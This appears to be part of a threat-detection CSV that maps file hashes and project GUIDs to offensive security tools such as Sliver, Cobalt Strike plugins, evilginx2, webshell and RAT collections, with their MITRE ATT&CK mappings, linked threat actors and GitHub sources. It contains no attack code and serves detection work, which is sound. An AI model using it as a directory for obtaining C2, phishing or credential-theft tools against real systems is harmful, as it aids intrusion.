"*c676b559a0d13fec22804c9489726a9a6ffbb6260c866cb5e5964067ea733bcc*",".{0,1000}c676b559a0d13fec22804c9489726a9a6ffbb6260c866cb5e5964067ea733bcc.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","37140"
"*c676b559a0d13fec22804c9489726a9a6ffbb6260c866cb5e5964067ea733bcc*",".{0,1000}c676b559a0d13fec22804c9489726a9a6ffbb6260c866cb5e5964067ea733bcc.{0,1000}","offensive_tool_keyword","EventLogMaster","Cobalt Strike Plugin - RDP Log Forensics & Clearing","T1070.001 - T1070.003 - T1070.004 - T1563.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/QAX-A-Team/EventLogMaster","1","0","#filehash","N/A","6","4","361","73","2019-12-23T10:31:35Z","2019-12-17T05:07:09Z","37141"
"*c685c2c3c886ac36781acaafd1292c4d25d4721299dcdaa1c0a79dac5ec469da*",".{0,1000}c685c2c3c886ac36781acaafd1292c4d25d4721299dcdaa1c0a79dac5ec469da.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","37144"
"*c68ea57d7555c49ef4c5ea05363fe0ced7978e751331ea949005d70fff000a00*",".{0,1000}c68ea57d7555c49ef4c5ea05363fe0ced7978e751331ea949005d70fff000a00.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","37145"
"*c68f85a725ff87d40c7ba00d7ffc8e205048d8977a273327df653821a8a06e53*",".{0,1000}c68f85a725ff87d40c7ba00d7ffc8e205048d8977a273327df653821a8a06e53.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","37147"
"*c690147b75389b32998feda3c01ec481fcc0e0dea1876b8ec00cd97846665557*",".{0,1000}c690147b75389b32998feda3c01ec481fcc0e0dea1876b8ec00cd97846665557.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","37148"
"*c690e348e6aeb7b59b07a9872ea075ae73102081eeede8816a51534f77dbb62f*",".{0,1000}c690e348e6aeb7b59b07a9872ea075ae73102081eeede8816a51534f77dbb62f.{0,1000}","offensive_tool_keyword","DRSAT","Disconnected RSAT is a launcher for the official Group Policy Manager - Certificate Authority and Certificate Templates snap-in to bypass the domain joined requirement that is needed when using the official MMC snap-in. The tool works by injecting a C# library into MMC that will hook the various API calls to trick MMC into believing that the logged on user is a domain user. attackers can abuse Disconnected RSAT to interact with Active Directory (AD) environments from non-domain-joined machines","T1559.001 - T1112 - T1078 - T1134.002 - T1055.001","TA0002 - TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/CCob/DRSAT","1","0","#filehash","N/A","6","3","233","25","2024-12-27T11:44:18Z","2024-09-04T16:35:02Z","37149"
"*c6911bc54aa83ecb15b78f6a9ebe8bdbd8b9a3d126001c503e6cc3358aed0657*",".{0,1000}c6911bc54aa83ecb15b78f6a9ebe8bdbd8b9a3d126001c503e6cc3358aed0657.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#filehash","N/A","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","37150"
"*c6962ca89b28d1e9a7aa34b7de5c629e29a8eb732a0b8010406de83d0f2f8c2a*",".{0,1000}c6962ca89b28d1e9a7aa34b7de5c629e29a8eb732a0b8010406de83d0f2f8c2a.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","37151"
"*c69727332807589ac1ed83cb794a36a98bf754d73d56063ba6a25bbeee71d6b1*",".{0,1000}c69727332807589ac1ed83cb794a36a98bf754d73d56063ba6a25bbeee71d6b1.{0,1000}","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","KNOTWEED","Discovery","https://github.com/Group3r/Group3r","1","0","#filehash","AD Enumeration","7","8","781","68","2025-04-08T05:03:34Z","2021-07-05T05:05:42Z","37152"
"*c6986103a201b81ebf196dd945c4bf5b1992b4fd8db03479d7be2595a5c467fc*",".{0,1000}c6986103a201b81ebf196dd945c4bf5b1992b4fd8db03479d7be2595a5c467fc.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","37153"
"*c69b56a061711d9f4b9657ec0ba7aa0ce715185b025cc4c123de462743cde4f8*",".{0,1000}c69b56a061711d9f4b9657ec0ba7aa0ce715185b025cc4c123de462743cde4f8.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","37154"
"*c69d94f220f61721a55d3cea7e7b5d72ce0a9cf3b24620c8e41835cefe2267f0*",".{0,1000}c69d94f220f61721a55d3cea7e7b5d72ce0a9cf3b24620c8e41835cefe2267f0.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","37155"
"*c6a8607653837d746af95e31b26eb9a5de03cd396270cf5733ba6468a4027cfd*",".{0,1000}c6a8607653837d746af95e31b26eb9a5de03cd396270cf5733ba6468a4027cfd.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","37156"
"*c6a8d755e4764335fa9c5313c6ba641ac9a0228648065667f7d535457dbf0ceb*",".{0,1000}c6a8d755e4764335fa9c5313c6ba641ac9a0228648065667f7d535457dbf0ceb.{0,1000}","offensive_tool_keyword","TimeException","A tool to find folders excluded from AV real-time scanning using a time oracle","T1518.001 - T1070.004 - T1083","TA0005 - TA0007","N/A","N/A","Defense Evasion","https://github.com/bananabr/TimeException","1","0","#filehash","N/A","8","3","233","16","2024-02-13T16:22:09Z","2022-07-19T02:47:52Z","37157"
"*c6a9c538cf33c226c5ff0d37557c0d7d59c62bf37a2765fa090c1ee962edf02d*",".{0,1000}c6a9c538cf33c226c5ff0d37557c0d7d59c62bf37a2765fa090c1ee962edf02d.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","37158"
"*c6aa399c903df33b37acf2e4d8a1e7f514d4e09f046e50dfe5efdb980cf34c16*",".{0,1000}c6aa399c903df33b37acf2e4d8a1e7f514d4e09f046e50dfe5efdb980cf34c16.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","37159"
"*c6aea9877ddbdd222da02ccf3b094f68b7bcef85c3dd496b64a6960de177f29b*",".{0,1000}c6aea9877ddbdd222da02ccf3b094f68b7bcef85c3dd496b64a6960de177f29b.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","37160"
"*c6b3f1648f7137df91606f6aaaa6d25d672e18c8adcb178c6d8cdcf3148a3c81*",".{0,1000}c6b3f1648f7137df91606f6aaaa6d25d672e18c8adcb178c6d8cdcf3148a3c81.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","37161"
"*c6b8be2b81f56a9f4330f7ccae161bda9de8deaf375bb8d1150264aa6fb502e9*",".{0,1000}c6b8be2b81f56a9f4330f7ccae161bda9de8deaf375bb8d1150264aa6fb502e9.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","37163"
"*c6bd027f5269a980cd4deffcdbdab77eb317db2a9737d727b55fe37710cd2f95*",".{0,1000}c6bd027f5269a980cd4deffcdbdab77eb317db2a9737d727b55fe37710cd2f95.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","37164"
"*c6d0fdd776065e3d211426e2f7cfd0f69e17af3e0c7479777b8a65e87517f54c*",".{0,1000}c6d0fdd776065e3d211426e2f7cfd0f69e17af3e0c7479777b8a65e87517f54c.{0,1000}","offensive_tool_keyword","gTunnel","tunelling solution written in golang","T1573.002 - T1071 - T1090 - T1105 - T1020","TA0005 - TA0010 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hotnops/gTunnel","1","0","#filehash","N/A","10","10","266","49","2023-05-17T05:24:58Z","2020-03-09T02:52:48Z","37167"
"*c6d9d8cf99b21d48310621c5f02331d0d36253f742ed13f93a4de1db74a668ac*",".{0,1000}c6d9d8cf99b21d48310621c5f02331d0d36253f742ed13f93a4de1db74a668ac.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","#filehash","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","37168"
"*c6e09870a9f7d1e74d9364d7a4d27cc0ad96f1637ee3e60e2c2df5169972058c*",".{0,1000}c6e09870a9f7d1e74d9364d7a4d27cc0ad96f1637ee3e60e2c2df5169972058c.{0,1000}","offensive_tool_keyword","dropper","Generates Malicious Office Macro Enabled Dropper for DLL SideLoading and Embed it in Lnk file to bypass MOTW","T1059 - T1574.002 - T1218 - T1559.003","TA0002 - TA0005 - TA0009","N/A","N/A","Resource Development","https://github.com/SaadAhla/dropper","1","0","#filehash","N/A","10","","N/A","","","","37170"
"*c6e3c9a568baf4bc4c535b6c6de60b91af599e63bf3a3926f9d04f775a86b355*",".{0,1000}c6e3c9a568baf4bc4c535b6c6de60b91af599e63bf3a3926f9d04f775a86b355.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","37171"
"*c6e3cbe978095e155f6fafe6028c2f6a0a6e156a46d3473fb795c701ead2fd0b*",".{0,1000}c6e3cbe978095e155f6fafe6028c2f6a0a6e156a46d3473fb795c701ead2fd0b.{0,1000}","offensive_tool_keyword","PSAttack","PSAttack contains over 100 commands for Privilege Escalation - Recon and Data Exfilitration","T1059 - T1212 - T1012 - T1087 - T1005 - T1041 - T1020","TA0002 - TA0004 - TA0005 - TA0007 - TA0010 - TA0008","N/A","N/A","Exploitation tool","https://github.com/GDSSecurity/PSAttack","1","0","#filehash","N/A","10","1","45","15","2017-04-04T20:37:33Z","2016-02-22T23:45:22Z","37172"
"*c6ec76b8a6041bb25bd2699684ad58f63a6923aa1e4985438345fd99cdf11e20*",".{0,1000}c6ec76b8a6041bb25bd2699684ad58f63a6923aa1e4985438345fd99cdf11e20.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","37173"
"*c6faca2a240b79782651662d2de7511752a97dc187a93955bc83ef3e1b17326f*",".{0,1000}c6faca2a240b79782651662d2de7511752a97dc187a93955bc83ef3e1b17326f.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","37177"
"*c6ffad5c09f5fb6fe7241d3fe9c9cd968ceea15e483a180ac45bd0b4e15d7bcd*",".{0,1000}c6ffad5c09f5fb6fe7241d3fe9c9cd968ceea15e483a180ac45bd0b4e15d7bcd.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","37178"
"*c702fa1d6618739e09cfb8e8cb79d563b1da757539bbee812748a79a0624e271*",".{0,1000}c702fa1d6618739e09cfb8e8cb79d563b1da757539bbee812748a79a0624e271.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1068 - T1548.004 - T1611 - T1203 - T1059.004","TA0004 - TA0001 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/liamg/traitor","1","0","#linux #filehash","N/A","10","10","6853","651","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z","37179"
"*c7070018339311195621126010bad10ffa062b36835b834a16a648d5e27aeece*",".{0,1000}c7070018339311195621126010bad10ffa062b36835b834a16a648d5e27aeece.{0,1000}","offensive_tool_keyword","antSword","cross-platform website management toolkit - abused by attackers - supports the use of web shells","T1505.003 - T1059 - T1100 - T1027 - T1219 - T1071","TA0002 - TA0003 - TA0005 - TA0011","antSword webshell","APT41 - APT15","C2","https://github.com/AntSwordProject/antSword","1","0","#filehash","N/A","10","10","4010","616","2025-01-20T12:48:42Z","2016-03-11T09:28:00Z","37183"
"*c708b83f-4167-4b4c-a1db-d2011ecb3200*",".{0,1000}c708b83f\-4167\-4b4c\-a1db\-d2011ecb3200.{0,1000}","offensive_tool_keyword","o365enum","Enumerate valid usernames from Office 365 using ActiveSync - Autodiscover v1 or office.com login page.","T1595 - T1595.002 - T1114 - T1114.001 - T1087 - T1087.002","TA0040 - TA0010 - TA0007","N/A","N/A","Exploitation tool","https://github.com/gremwell/o365enum","1","0","#GUIDproject","N/A","7","3","267","39","2024-05-02T07:45:31Z","2020-02-18T12:22:50Z","37184"
"*c70b1fd133737a21904159ed2a867e0105060ac74937472da5e4d0e1f6fa1645*",".{0,1000}c70b1fd133737a21904159ed2a867e0105060ac74937472da5e4d0e1f6fa1645.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","37185"
"*c710f02d5ffdfe2b84a781b3da2d10b908d169c93fe1b91458829b28cb4dd473*",".{0,1000}c710f02d5ffdfe2b84a781b3da2d10b908d169c93fe1b91458829b28cb4dd473.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","0","#filehash","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","37187"
"*c711f24519988ac03d68431f8db8190045a81e1068fe074666337cb32c7008f6*",".{0,1000}c711f24519988ac03d68431f8db8190045a81e1068fe074666337cb32c7008f6.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","37188"
"*c71270964c15f42df8e82477be2e7c833c947f7be29f1ee269835b06360bc5d5*",".{0,1000}c71270964c15f42df8e82477be2e7c833c947f7be29f1ee269835b06360bc5d5.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","#filehash","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","37189"
"*C715155F-2BE8-44E0-BD34-2960067874C8*",".{0,1000}C715155F\-2BE8\-44E0\-BD34\-2960067874C8.{0,1000}","offensive_tool_keyword","ProxyLogon","ProxyLogon exploitation","T1190 - T1210 - T1213 - T1003 - T1059.003","TA0001 - TA0002 - TA0006 - TA0007","N/A","Dispossessor","Exploitation tool","https://github.com/hausec/ProxyLogon","1","0","#GUIDproject","N/A","10","3","293","76","2024-07-02T10:00:00Z","2021-03-15T14:37:57Z","37190"
"*c725919e6357126d512c638f993cf572112f323da359645e4088f789eb4c7b8c*",".{0,1000}c725919e6357126d512c638f993cf572112f323da359645e4088f789eb4c7b8c.{0,1000}","offensive_tool_keyword","reaper","Reaper is a proof-of-concept designed to exploit BYOVD (Bring Your Own Vulnerable Driver) driver vulnerability. This malicious technique involves inserting a legitimate - vulnerable driver into a target system - which allows attackers to exploit the driver to perform malicious actions.","T1547.009 - T1215 - T1129 - T1548.002","TA0002 - TA0003 - TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/MrEmpy/Reaper","1","0","#filehash","N/A","10","2","158","34","2024-12-07T01:52:58Z","2023-09-21T02:09:48Z","37191"
"*c728e54e57a93ffbbe606d72fa12abb736236e7a1e263b49cf7e302de32f1100*",".{0,1000}c728e54e57a93ffbbe606d72fa12abb736236e7a1e263b49cf7e302de32f1100.{0,1000}","offensive_tool_keyword","AV_Evasion_Tool","Undetectable Payload Generator Tool","T1027 - T1036 - T1059 - T1107","TA0005","N/A","N/A","Defense Evasion","https://github.com/1y0n/AV_Evasion_Tool","1","0","#filehash","N/A","10","10","2680","406","2023-12-08T07:38:06Z","2020-04-24T01:11:09Z","37192"
"*c729c62e99676b82fc639b5dc2877c044194933ae32406d532d8e5a8e86590af*",".{0,1000}c729c62e99676b82fc639b5dc2877c044194933ae32406d532d8e5a8e86590af.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","37193"
"*c730a89142b73d047b4387f6f3f0d8dfacef57a2e4945a0a942cc72f0bd05253*",".{0,1000}c730a89142b73d047b4387f6f3f0d8dfacef57a2e4945a0a942cc72f0bd05253.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","0","#filehash","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","37195"
"*C73A4893-A5D1-44C8-900C-7B8850BBD2EC*",".{0,1000}C73A4893\-A5D1\-44C8\-900C\-7B8850BBD2EC.{0,1000}","offensive_tool_keyword","JuicyPotatoNG","Another Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","FoxKitten - APT33 - Volatile Cedar - Sandworm","Privilege Escalation","https://github.com/antonioCoco/JuicyPotatoNG","1","0","#GUIDproject","N/A","10","9","844","101","2022-11-12T01:48:39Z","2022-09-21T17:08:35Z","37197"
"*c742ea98e937cf3177ff80f3f1863798c1354cf4cefc8eabc677ce2fdb1f510c*",".{0,1000}c742ea98e937cf3177ff80f3f1863798c1354cf4cefc8eabc677ce2fdb1f510c.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","37198"
"*c74897b1e986e2876873abb3b5069bf1b103667f7f0e6b4581fbda3fd647a74a*",".{0,1000}c74897b1e986e2876873abb3b5069bf1b103667f7f0e6b4581fbda3fd647a74a.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","37199"
